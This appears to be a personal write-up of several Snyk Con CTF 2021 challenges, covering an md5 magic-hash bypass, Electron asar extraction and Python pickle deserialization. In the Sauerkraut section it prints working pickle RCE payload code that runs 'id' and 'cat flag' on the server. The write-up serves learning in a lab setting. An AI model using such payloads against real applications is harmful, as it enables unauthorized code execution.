Snyk Con CTF 2021

Hello everyone , I hope you are doing well , On 5th October , Snyk CTF ran from 9:00 am — 7:00 pm ET , I didn’t really solve majority of challenges due to less time but the ones and I did will be sharing with you. The whole CTF was fun having majority of challenges as it was a jeopardy style CTF. For some of the challenges I wasn’t able to make writeups as the ctf was ended and the challenges weren’t up after the competition. So here are some challenges that I managed to make writeups of.

Magician (Web)

This web challenege had an input field where it was asking for us to input the string whose md5 hash will be equal to the given one meaning a hash collision where hashes of different file or string are similar

I tried to give some random text and in the bottom it should be the md5 hash of that string

But we need to put a string whose hash will be the same like this 0e365027561978452045683563242341 I tried to crack this md5hash using crackstation and hashcat but failed ,so I googled for this hash

So we just have to submit this string QNKCDZO and we will pass the condition

Electronbuzz (Misc)

In this challenge we were given an electron application in the form of windows,linux file , so I downloaded the debian package and extracted it , on which I app.asar file , which in electron holds the source code and some configuration file of the main application

We can extract this by using npx asar extract app.asar . , you can install npx using npm install -g asar

And we can get the flag by reading challenge.yml

Robert Louis Stevenson (Misc)

In this challenge we were given a tar file that on extracting we have some folders which also included archive file

Going into each directory and search for a file which may have something

And the flag was in one of the folders

Sauerkraut (Web)

This was a web challenege that had text form where we can submit text

On entering some text , it gave us an error about “invalid base64”

So after inputtting encoded text we get this

It then showed that “it could not find MARK” , I didn’t know what that meant so I just encoded that text

And when I submitted that , it showed me “pickle data was truncated”

Here I then goolged pickle , and found that it's a library or module that allows you to serliaze data , convert them into objects so that it can be passed for different process

And this lead me to exploiting to pickle in python , I found a resource where it showed RCE for pickle so this is the PoC that I found

import base64
import codecs
import pickle
class RCE(object):
def __reduce__(self):
import subprocess
return (subprocess.check_output, (['id'], ) )
class RCEStr(object):
def __reduce__(self):
return (codecs.decode, (RCE(), 'utf-8') )
pickle_data = pickle.dumps({'name': RCEStr()})
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))

Perfect , we have found the we can do remote code execution , all that is left is to find the flag , so I ran ls command to see if there's a file we can read

import base64
import codecs
import pickle
class RCE(object):
def __reduce__(self):
import subprocess
return (subprocess.check_output, (['cat','flag'], ) )
class RCEStr(object):
def __reduce__(self):
return (codecs.decode, (RCE(), 'utf-8') )
pickle_data = pickle.dumps({'name': RCEStr()})
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))

References

BS CS undergraduate | CTF Player